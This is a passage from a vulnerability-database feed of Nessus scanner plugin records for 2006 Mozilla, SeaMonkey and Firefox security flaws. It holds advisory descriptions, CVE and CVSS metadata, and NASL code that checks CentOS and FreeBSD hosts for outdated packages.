in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3807, CVE-2006-3809, CVE-2006-3812)\n\nSeveral denial of service flaws were found in the way SeaMonkey\nprocessed certain web content. A malicious web page could crash the\nbrowser or possibly execute arbitrary code as the user running\nSeaMonkey. (CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\n\nA buffer overflow flaw was found in the way SeaMonkey Messenger\ndisplayed malformed inline vcard attachments. If a victim viewed an\nemail message containing a carefully crafted vcard, it was possible to\nexecute arbitrary code as the user running SeaMonkey Messenger.\n(CVE-2006-3804)\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could conduct a cross-site\nscripting attack or steal sensitive information (such as cookies owned\nby other domains). (CVE-2006-3802, CVE-2006-3810)\n\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig\nscripts. A malicious Proxy AutoConfig server could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3808)\n\nUsers of SeaMonkey are advised to upgrade to this update, which\ncontains SeaMonkey version 1.0.3 that corrects these issues.", "edition": 27, "published": "2006-08-07T00:00:00", "title": "CentOS 3 : seamonkey (CESA-2006:0608)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2006-08-07T00:00:00", "cpe": ["p-cpe:/a:centos:centos:seamonkey-nspr-devel", "p-cpe:/a:centos:centos:seamonkey-mail", "p-cpe:/a:centos:centos:seamonkey-nss-devel", "p-cpe:/a:centos:centos:seamonkey-dom-inspector", "p-cpe:/a:centos:centos:seamonkey-chat", "p-cpe:/a:centos:centos:seamonkey-nss", "p-cpe:/a:centos:centos:seamonkey-nspr", "p-cpe:/a:centos:centos:seamonkey", "p-cpe:/a:centos:centos:seamonkey-js-debugger", "p-cpe:/a:centos:centos:seamonkey-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2006-0608.NASL", "href": "https://www.tenable.com/plugins/nessus/22162", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0608 and \n# CentOS Errata and Security Advisory 2006:0608 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22162);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_xref(name:\"RHSA\", value:\"2006:0608\");\n\n script_name(english:\"CentOS 3 : seamonkey (CESA-2006:0608)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated SeaMonkey packages that fix several security bugs are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3807, CVE-2006-3809, CVE-2006-3812)\n\nSeveral denial of service flaws were found in the way SeaMonkey\nprocessed certain web content. A malicious web page could crash the\nbrowser or possibly execute arbitrary code as the user running\nSeaMonkey. (CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\n\nA buffer overflow flaw was found in the way SeaMonkey Messenger\ndisplayed malformed inline vcard attachments. If a victim viewed an\nemail message containing a carefully crafted vcard, it was possible to\nexecute arbitrary code as the user running SeaMonkey Messenger.\n(CVE-2006-3804)\n\nSeveral flaws were found in the way SeaMonkey processed certain\nJavaScript actions. A malicious web page could conduct a cross-site\nscripting attack or steal sensitive information (such as cookies owned\nby other domains). (CVE-2006-3802, CVE-2006-3810)\n\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig\nscripts. A malicious Proxy AutoConfig server could execute arbitrary\nJavaScript instructions with the permissions of 'chrome', allowing the\npage to steal sensitive information or install browser malware.\n(CVE-2006-3808)\n\nUsers of SeaMonkey are advised to upgrade to this update, which\ncontains SeaMonkey version 1.0.3 that corrects these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013115.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?46fc1784\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013123.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?49c91b51\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2006-August/013124.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a782cb4c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-chat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-js-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-chat-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-devel-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-dom-inspector-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-js-debugger-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-mail-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nspr-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nspr-devel-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nss-1.0.3-0.el3.1.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nss-devel-1.0.3-0.el3.1.centos3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey / seamonkey-chat / seamonkey-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:50:54", "description": "A Mozilla Foundation Security Advisory reports of multiple issues.\nSeveral of which can be used to run arbitrary code with the privilege\nof the user running the program.\n\n- MFSA 2006-56 chrome: scheme loading remote content\n\n- MFSA 2006-55 Crashes with evidence of memory corruption (rv:1.8.0.5)\n\n- MFSA 2006-54 XSS with XPCNativeWrapper(window).Function(...)\n\n- MFSA 2006-53 UniversalBrowserRead privilege escalation\n\n- MFSA 2006-52 PAC privilege escalation using Function.prototype.call\n\n- MFSA 2006-51 Privilege escalation using named-functions and\nredefined 'new Object()'\n\n- MFSA 2006-50 JavaScript engine vulnerabilities\n\n- MFSA 2006-49 Heap buffer overwrite on malformed VCard\n\n- MFSA 2006-48 JavaScript new Function race condition\n\n- MFSA 2006-47 Native DOM methods can be hijacked across domains\n\n- MFSA 2006-46 Memory corruption with simultaneous events\n\n- MFSA 2006-45 JavaScript navigator Object Vulnerability\n\n- MFSA 2006-44 Code execution through deleted frame reference", "edition": 26, "published": "2006-07-28T00:00:00", "title": "FreeBSD : mozilla -- multiple vulnerabilities (e2a92664-1d60-11db-88cf-000c6ec775d9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2006-07-28T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-thunderbird", "p-cpe:/a:freebsd:freebsd:mozilla-thunderbird", "p-cpe:/a:freebsd:freebsd:linux-firefox", "p-cpe:/a:freebsd:freebsd:mozilla", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:seamonkey", "p-cpe:/a:freebsd:freebsd:linux-seamonkey", "p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:linux-firefox-devel", "p-cpe:/a:freebsd:freebsd:thunderbird", "p-cpe:/a:freebsd:freebsd:linux-mozilla", "p-cpe:/a:freebsd:freebsd:linux-mozilla-devel"], "id": "FREEBSD_PKG_E2A926641D6011DB88CF000C6EC775D9.NASL", "href": "https://www.tenable.com/plugins/nessus/22105", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22105);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n\n script_name(english:\"FreeBSD : mozilla -- multiple vulnerabilities (e2a92664-1d60-11db-88cf-000c6ec775d9)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Mozilla Foundation Security Advisory reports of multiple issues.\nSeveral of which can be used to run arbitrary code with the privilege\nof the user running the program.\n\n- MFSA 2006-56 chrome: scheme loading remote content\n\n- MFSA 2006-55 Crashes with evidence of memory corruption (rv:1.8.0.5)\n\n- MFSA 2006-54 XSS with XPCNativeWrapper(window).Function(...)\n\n- MFSA 2006-53 UniversalBrowserRead privilege escalation\n\n- MFSA 2006-52 PAC privilege escalation using Function.prototype.call\n\n- MFSA 2006-51 Privilege escalation using named-functions and\nredefined 'new Object()'\n\n- MFSA 2006-50 JavaScript engine vulnerabilities\n\n- MFSA 2006-49 Heap buffer overwrite on malformed VCard\n\n- MFSA 2006-48 JavaScript new Function race condition\n\n- MFSA 2006-47 Native DOM methods can be hijacked across domains\n\n- MFSA 2006-46 Memory corruption with simultaneous events\n\n- MFSA 2006-45 JavaScript navigator Object Vulnerability\n\n- MFSA 2006-44 Code execution through deleted frame reference\"\n );\n # http://www.mozilla.org/projects/security/known-vulnerabilities.html#seamonkey1.0.3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69974ef6\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-44.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-44/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-45.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-45/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-46/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-47.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-47/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-48.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-48/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-49.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-49/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-50.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-50/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-51.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-51/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-52.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-52/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-53/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-54/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-55/\"\n );\n # http://www.mozilla.org/security/announce/2006/mfsa2006-56.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-56/\"\n );\n # https://vuxml.freebsd.org/freebsd/e2a92664-1d60-11db-88cf-000c6ec775d9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6806fa7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"firefox<1.5.0.5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox>2.*,1<2.0_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox<1.5.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-firefox-devel<3.0.a2006.07.26\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"seamonkey<1.0.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-seamonkey<1.0.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<1.5.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-thunderbird<1.5.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-thunderbird<1.5.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla-devel>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:14:05", "description": "This security update brings Mozilla Firefox to version 1.5.0.6.\n\nMore details can be found on:\nhttp://www.mozilla.org/projects/security/known-vulnerabiliti es.html\n\nIt includes fixes to the following security problems :\n\n - Code execution through deleted frame reference.\n (CVE-2006-3801 / MFSA 2006-44)\n\n Thilo Girmann discovered that in certain circumstances a\n JavaScript reference to a frame or window was not\n properly cleared when the referenced content went away,\n and he demonstrated that this pointer to a deleted\n object could be used to execute native code supplied by\n the attacker.\n\n - JavaScript navigator Object Vulnerability.\n (CVE-2006-3677 / MFSA 2006-45)\n\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java\n would reference properties of the window.navigator\n object as it started up. If the page replaced the\n navigator object before starting Java then the browser\n would crash in a way that could be exploited to run\n native code supplied by the attacker.\n\n - Memory corruption with simultaneous events.\n (CVE-2006-3113 / MFSA 2006-46)\n\n Secunia Research has discovered a vulnerability in\n Mozilla Firefox 1.5 branch, which can be exploited by\n malicious people to compromise a user's system.\n\n The vulnerability is caused due to an memory corruption\n error within the handling of simultaneously happening\n XPCOM events, which leads to use of a deleted timer\n object. This generally results in a crash but\n potentially could be exploited to execute arbitrary code\n on a user's system when a malicious website is visited.\n\n - Native DOM methods can be hijacked across domains.\n (CVE-2006-3802 / MFSA 2006-47)\n\n A malicious page can hijack native DOM methods on a\n document object in another domain, which will run the\n attacker's script when called by the victim page. This\n could be used to steal login cookies, password, or other\n sensitive data on the target page, or to perform actions\n on behalf of a logged-in user.\n\n Access checks on all other properties and document nodes\n are performed correctly. This cross-site scripting (XSS)\n attack is limited to pages which use standard DOM\n methods of the top-level document object, such as\n document.getElementById(). This includes many popular\n sites, especially the newer ones that offer rich\n interaction to the user.\n\n - JavaScript new Function race condition. (CVE-2006-3803 /\n MFSA 2006-48)\n\n H. D. Moore reported a testcase that was able to trigger\n a race condition where JavaScript garbage collection\n deleted a temporary variable still being used in the\n creation of a new Function object. The resulting use of\n a deleted object may be potentially exploitable to run\n native code provided by the attacker.\n\n - Heap buffer overwrite on malformed VCard. (CVE-2006-3804\n / MFSA 2006-49)\n\n A VCard attachment with a malformed base64 field (such\n as a photo) can trigger a heap buffer overwrite. These\n have proven exploitable in the past, though in this case\n the overwrite is accompanied by an integer underflow\n that would attempt to copy more data than the typical\n machine has, leading to a crash.\n\n - JavaScript engine vulnerabilities. (CVE-2006-3805 /\n CVE-2006-3806 / MFSA 2006-50)\n\n Continuing our security audit of the JavaScript engine,\n Mozilla developers found and fixed several potential\n vulnerabilities.\n\n Igor Bukanov and shutdown found additional places where\n an untimely garbage collection could delete a temporary\n object that was in active use (similar to MFSA 2006-01 /\n MFSA 2006-10). Some of these may allow an attacker to\n run arbitrary code given the right conditions.\n\n Georgi Guninski found potential integer overflow issues\n with long strings in the toSource() methods of the\n Object, Array and String objects as well as string\n function arguments.\n\n - Privilege escalation using named-functions and redefined\n 'new Object()'. (CVE-2006-3807 / MFSA 2006-51)\n\n moz_bug_r_a4 discovered that named JavaScript functions\n have a parent object created using the standard Object()\n constructor (ECMA-specified behavior) and that this\n constructor can be redefined by script (also\n ECMA-specified behavior). If the Object() constructor is\n changed to return a reference to a privileged object\n with useful properties it is possible to have\n attacker-supplied script excuted with elevated\n privileges by calling the function. This could be used\n to install malware or take other malicious actions.\n\n Our fix involves calling the internal Object constructor\n which appears to be what other ECMA-compatible\n interpreters do.\n\n - PAC privilege escalation using Function.prototype.call.\n (CVE-2006-3808 / MFSA 2006-52)\n\n moz_bug_r_a4 reports that a malicious Proxy AutoConfig\n (PAC) server could serve a PAC script that can execute\n code with elevated privileges by setting the required\n FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox. By\n redirecting the victim to a specially crafted URL --\n easily done since the PAC script controls which proxy to\n use -- the URL 'hostname' can be executed as privileged\n script.\n\n A malicious proxy server can perform spoofing attacks on\n the user so it was already important to use a\n trustworthy PAC server.\n\n - UniversalBrowserRead privilege escalation.\n (CVE-2006-3809 / MFSA 2006-53)\n\n shutdown reports that scripts granted the\n UniversalBrowserRead privilege can leverage that into\n the equivalent of the far more powerful\n UniversalXPConnect since they are allowed to 'read' into\n a privileged context. This allows the attacker the\n ability to run scripts with the full privelege of the\n user running the browser, possibly installing malware or\n snooping on private data. This has been fixed so that\n UniversalBrowserRead and UniversalBrowserWrite are\n limited to reading from and writing into only\n normally-privileged browser windows and frames.\n\n - XSS with XPCNativeWrapper(window).Function(...).\n (CVE-2006-3810 / MFSA 2006-54)\n\n shutdown reports that cross-site scripting (XSS) attacks\n could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a\n function that appeared to belong to the window in\n question even after it had been navigated to the target\n site.\n\n - Crashes with evidence of memory corruption.\n (CVE-2006-3811 / MFSA 2006-55)\n\n As part of the Firefox 1.5.0.5 stability and security\n release, developers in the Mozilla community looked for\n and fixed several crash bugs to improve the stability of\n Mozilla clients. Some of these crashes showed evidence\n of memory corruption that we presume could be exploited\n to run arbitrary code with enough effort.\n\n - chrome: scheme loading remote content. (CVE-2006-3812 /\n MFSA 2006-56)\n\n Benjamin Smedberg discovered that chrome URL's could be\n made to reference remote files, which would run scripts\n with full privilege. There is no known way for web\n content to successfully load a chrome: url, but if a\n user could be convinced to do so manually (perhaps by\n copying a link and pasting it into the location bar)\n this could be 